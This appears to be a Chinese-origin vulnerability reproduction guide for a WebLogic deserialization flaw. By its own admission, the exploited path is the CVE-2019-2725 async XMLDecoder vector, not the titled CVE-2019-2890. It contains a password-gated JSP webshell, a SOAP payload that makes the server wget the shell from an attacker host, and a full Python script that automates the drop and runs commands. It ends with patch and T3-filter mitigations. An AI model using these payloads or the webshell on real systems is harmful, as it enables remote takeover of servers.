WebLogic deserialization vulnerability (CVE-2019-2890) reproduction

1. Vulnerability introduction

On October 15, 2019, Oracle released its October 2019 Critical Patch Update, which includes a high-risk WebLogic Server vulnerability, CVE-2019-2890, that can lead to remote code execution (RCE).

When WebLogic serves remote calls over the T3 protocol it deserializes Java objects sent by the client, and by default it screens those objects against a class blacklist to keep deserialization safe. CVE-2019-2890 bypasses that blacklist, so an attacker who can reach the T3 listener can deliver a crafted serialized object to a vulnerable instance and obtain code execution on the server. T3 listens on the same port as the administration console (7001 by default), and a default WebLogic installation enables the console, so a default install exposes T3 as well. One caveat: Oracle's advisory scores CVE-2019-2890 at CVSS 3.0 base 7.2 with privileges required set to high, i.e. it is not listed as remotely exploitable without authentication, so network access to the T3 port alone is not the whole precondition.

2. Scope of influence

WebLogic Server 10.3.6.0
WebLogic Server 12.1.3.0
WebLogic Server 12.2.1.3

3. Vulnerability environment setup

Enter the directory that holds the docker-compose file for this environment.

Start the container:

docker-compose up -d

Check which host port is mapped to the container's port 7001:

docker ps -a

4. Vulnerability detection

The script below is a fingerprint check rather than a trigger of the deserialization bypass: it reads the server version from the console footer and confirms that the wls9_async_response component answers at /_async/AsyncResponseService. A hit therefore means "affected version with the async component deployed", not a confirmed T3 blacklist bypass.

#author:xcc
import argparse
import re
import sys

import requests

headers = {
    'User-Agent': 'Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Mobile Safari/537.36'
}

# Versions listed as affected in the Oracle October 2019 advisory.
# The console footer prints a longer form (e.g. 12.2.1.3.0), so match on prefix.
VULN_VERSIONS = ['12.2.1.3', '12.1.3.0', '10.3.6.0']


def parse_target():
    parser = argparse.ArgumentParser(description='WebLogic Deserialization Vulnerability (CVE-2019-2890) POC')
    parser.add_argument('target_url', type=str, help='The target address, example: http://192.168.140.153:7001')
    args = parser.parse_args()
    url = args.target_url.rstrip('/')
    print('[+]author:xcc')
    print('[-]WebLogic deserialization vulnerability (CVE-2019-2890) detection')
    print(f'[-]target:{url}')
    print('[-]Requesting target address...')
    if not (url.startswith('http://') or url.startswith('https://')):
        print('[-]Please include http:// or https:// in the URL!!')
        sys.exit(0)
    return url


def poc(url):
    url_console = url + '/console'
    try:
        # The console footer carries the exact server version, e.g. "WebLogic Server Version: 12.2.1.3.0"
        console_text = requests.get(url=url_console, headers=headers, timeout=10).text
        ex = r'<p id="footerVersion">WebLogic Server .*: (.*?)</p>'
        result = re.findall(ex, console_text, re.S)
        version = result[0].strip() if result else ''
        # The /_async endpoint only answers when the wls9_async_response component is deployed
        url_vul = url + '/_async/AsyncResponseService'
        r = requests.get(url=url_vul, headers=headers, timeout=10)
        async_present = r.status_code == 200 and 'Welcome to the' in r.text
        if async_present and any(version.startswith(v) for v in VULN_VERSIONS):
            print(f'[+]Vulnerability exists (version {version}, /_async reachable)')
        else:
            print('[-]The vulnerability does not exist')
    except Exception as error:
        print('An error occurred: ', error)


if __name__ == '__main__':
    poc(parse_target())

5. Vulnerability reproduction

Note: the steps below exercise the wls9_async_response component at /_async/AsyncResponseService with a WorkContext (java.beans.XMLDecoder) payload over plain HTTP. That vector is the one Oracle addressed as CVE-2019-2725 in April 2019, not the T3 blacklist bypass described in section 1, so a server that already carries the CVE-2019-2725 fix will not be affected by this request even if it is still missing the October 2019 patch.

Open http://192.168.0.116:7001/_async/AsyncResponseService in a browser; a page starting with "Welcome to the ..." confirms that the async component is deployed.

Create a shell.txt file locally with the following JSP webshell (it runs the command passed in cmd when pwd equals 123):

<%
    if("123".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
        int a = -1;
        byte[] b = new byte[1024];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            // only print the bytes actually read, not the whole buffer
            out.println(new String(b, 0, a));
        }
        out.print("</pre>");
    }
%>

Start a web server on the attacking machine in the directory that contains shell.txt and confirm that http://<attacker>:12345/shell.txt is reachable from the target:

python -m http.server 12345

Capture a request to http://192.168.0.116:7001/_async/AsyncResponseService with Burp.

Replace the captured request with the following (Burp recalculates Content-Length when the body is edited):

POST /_async/AsyncResponseService HTTP/1.1
Host: 192.168.0.116:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Connection: close
Content-Length: 868
content-type: text/xml


<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>wget http://192.168.0.124:12345/shell.txt -O servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/shell.jsp</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>

If the request is accepted, the server fetches shell.txt and writes it as shell.jsp into the exploded wls9_async_response web application, from where it is served under /_async/. The hashed directory name in the path (8tpkys here) is specific to each deployment; check it on the target (or pick it up from the local docker environment) before sending the request. The attacker-side web server log showing the GET for shell.txt confirms the write.

Visit http://192.168.0.116:7001/_async/shell.jsp?pwd=123&cmd=ls

The response lists the files in the server process's working directory.
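The whole procedure above (build the WorkContext payload, post it to the async service, then call the dropped JSP) as a script, added here as an example and not part of the original write-up. The target, attacker address and the hashed war directory are assumptions copied from the walkthrough and must be replaced for a real run; the script also checks that the generated envelope is well-formed XML, which XMLDecoder requires before it will instantiate anything.

```python
import http.client
import urllib.parse
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

# Constructed example values (assumptions): replace for a real target.
TARGET = 'http://192.168.0.116:7001'
ATTACKER = 'http://192.168.0.124:12345'
ASYNC_WAR_DIR = 'servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war'


def build_workcontext_envelope(argv):
    """Return the SOAP envelope whose WorkContext header is a java.beans.XMLDecoder
    document that constructs java.lang.ProcessBuilder(argv) and calls start()."""
    items = ''.join(
        f'<void index="{i}"><string>{escape(arg)}</string></void>'
        for i, arg in enumerate(argv)
    )
    return (
        '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" '
        'xmlns:wsa="http://www.w3.org/2005/08/addressing" '
        'xmlns:asy="http://www.bea.com/async/AsyncResponseService">'
        '<soapenv:Header>'
        '<wsa:Action>xx</wsa:Action>'
        '<wsa:RelatesTo>xx</wsa:RelatesTo>'
        '<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">'
        '<void class="java.lang.ProcessBuilder">'
        f'<array class="java.lang.String" length="{len(argv)}">{items}</array>'
        '<void method="start"/>'
        '</void>'
        '</work:WorkContext>'
        '</soapenv:Header>'
        '<soapenv:Body><asy:onAsyncDelivery/></soapenv:Body>'
        '</soapenv:Envelope>'
    )


def envelope_is_well_formed(xml_text):
    """XMLDecoder needs a parseable document; check before sending."""
    try:
        ET.fromstring(xml_text)
        return True
    except ET.ParseError:
        return False


def dropper_argv(attacker, war_dir, name='shell.jsp'):
    """Argument vector that makes the server fetch shell.txt and save it inside the
    exploded async web application, where it is served under /_async/."""
    return ['/bin/bash', '-c', f'wget {attacker}/shell.txt -O {war_dir}/{name}']


def send_envelope(target, envelope, timeout=10):
    """POST the envelope to /_async/AsyncResponseService and return the HTTP status.
    The command has already run server-side by the time the status comes back."""
    u = urllib.parse.urlsplit(target)
    conn = http.client.HTTPConnection(u.hostname, u.port or 80, timeout=timeout)
    conn.request('POST', '/_async/AsyncResponseService', body=envelope.encode(),
                 headers={'Content-Type': 'text/xml'})
    resp = conn.getresponse()
    resp.read()
    conn.close()
    return resp.status


def run_shell_command(target, cmd, pwd='123', timeout=10):
    """Call the dropped JSP, /_async/shell.jsp?pwd=123&cmd=<cmd>, and return the body."""
    u = urllib.parse.urlsplit(target)
    q = urllib.parse.urlencode({'pwd': pwd, 'cmd': cmd})
    conn = http.client.HTTPConnection(u.hostname, u.port or 80, timeout=timeout)
    conn.request('GET', f'/_async/shell.jsp?{q}')
    body = conn.getresponse().read().decode(errors='replace')
    conn.close()
    return body


if __name__ == '__main__':
    envelope = build_workcontext_envelope(dropper_argv(ATTACKER, ASYNC_WAR_DIR))
    assert envelope_is_well_formed(envelope)
    print('status:', send_envelope(TARGET, envelope))
    print(run_shell_command(TARGET, 'ls'))
```

Arguments are XML-escaped individually, so a command containing `<`, `>` or `&` still produces a document XMLDecoder will parse; the argv form (`/bin/bash -c '<cmd>'`) is the same one used in the Burp request above.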

6. Bug fixes

1. Apply the Oracle October 2019 Critical Patch Update

https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html

2. Control access to the T3 protocol

CVE-2019-2890 is reached through WebLogic's T3 service, so until the patch is applied attacks can be blocked temporarily by restricting access to T3. When the WebLogic console port (7001 by default) is open, the T3 service is enabled on it by default. Note that this filter only covers t3/t3s: the HTTP request to /_async used in section 5 is not affected by it. Specific steps:

(1) In the WebLogic console, open the domain's configuration page (base_domain in this environment), go to the "Security" tab and click "Filter" to reach the connection filter configuration.

(2) In "Connection Filter" enter weblogic.security.net.ConnectionFilterImpl, and in "Connection Filter Rules" enter the following two rules (one per line), which allow t3 and t3s on all ports from the local host only and deny them from everywhere else:

127.0.0.1 * * allow t3 t3s
0.0.0.0/0 * * deny t3 t3s

(3) Save and restart the server for the rules to take effect.
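Two checks for the mitigation above, added here as an example and not part of the original write-up: a T3 probe that sends the handshake a T3 client opens with and looks for the server's HELO reply (a live listener answers with its version; a filtered one accepts the TCP connection but never completes the handshake), and a small simulator of the two connection filter rules. The simulator models the documented first-match-wins, default-allow evaluation of ConnectionFilterImpl rules, with target matching limited to IP addresses and CIDR ranges (hostname targets are not resolved); host, port and the sample banner bytes are constructed.

```python
import ipaddress
import socket

# Constructed example values (assumptions): replace for a real target.
TARGET_HOST = '192.168.0.116'
TARGET_PORT = 7001

# Opening bytes a T3 client sends; a live T3 listener answers with a HELO line.
T3_HELLO = b't3 12.2.1\nAS:255\nHL:19\n\n'

# The two rules from step (2) above.
CONSOLE_RULES = '127.0.0.1 * * allow t3 t3s\n0.0.0.0/0 * * deny t3 t3s'


def parse_t3_banner(data):
    """Extract the server version from a T3 HELO reply, e.g.
    b'HELO:12.2.1.3.0.false\\nAS:2048\\nHL:19\\n\\n' -> '12.2.1.3.0'. Returns None otherwise."""
    if not data.startswith(b'HELO:'):
        return None
    first = data.split(b'\n', 1)[0][len(b'HELO:'):].decode('ascii', errors='replace')
    # The version is followed by a '.true' / '.false' flag; strip it.
    for flag in ('.true', '.false'):
        if first.endswith(flag):
            first = first[:-len(flag)]
            break
    return first or None


def probe_t3(host, port, timeout=5):
    """Return ('open', version) when T3 answers, ('filtered', None) when the TCP
    connection is accepted but no HELO comes back (what the connection filter
    produces), or ('closed', None) when the connection is refused or times out."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(T3_HELLO)
            try:
                data = s.recv(1024)
            except socket.timeout:
                data = b''
    except OSError:
        return ('closed', None)
    version = parse_t3_banner(data)
    return ('open', version) if version else ('filtered', None)


def parse_filter_rules(text):
    """Parse ConnectionFilterImpl rules: 'target localAddr localPort action proto...'.
    The console accepts one rule per line; comma-separated input is split as well."""
    rules = []
    for line in text.replace(',', '\n').splitlines():
        parts = line.split()
        if len(parts) >= 5:
            rules.append({'target': parts[0], 'local_addr': parts[1], 'local_port': parts[2],
                          'action': parts[3], 'protocols': parts[4:]})
    return rules


def _target_matches(target, client_ip):
    if target == '*':
        return True
    try:
        net = ipaddress.ip_network(target, strict=False)  # '127.0.0.1' becomes /32
    except ValueError:
        return False  # hostname targets are not resolved in this simulation
    return ipaddress.ip_address(client_ip) in net


def decide(rules, client_ip, protocol):
    """First matching rule wins; with no match the connection is allowed.
    Local address/port wildcards are not evaluated here (simplification)."""
    for r in rules:
        if _target_matches(r['target'], client_ip) and protocol in r['protocols']:
            return r['action']
    return 'allow'


if __name__ == '__main__':
    rules = parse_filter_rules(CONSOLE_RULES)
    for ip, proto in [('127.0.0.1', 't3'), ('10.0.0.5', 't3'), ('10.0.0.5', 'http')]:
        print(f'{ip} {proto}: {decide(rules, ip, proto)}')
    print('T3 probe:', probe_t3(TARGET_HOST, TARGET_PORT))
```

Run the probe before and after applying the filter: a vulnerable default install reports ('open', '<version>') from a remote host, and after the restart the same probe should report 'filtered'. The simulator makes the coverage gap visible: a remote HTTP request matches no rule and is still allowed, which is why the filter does not help against the /_async path.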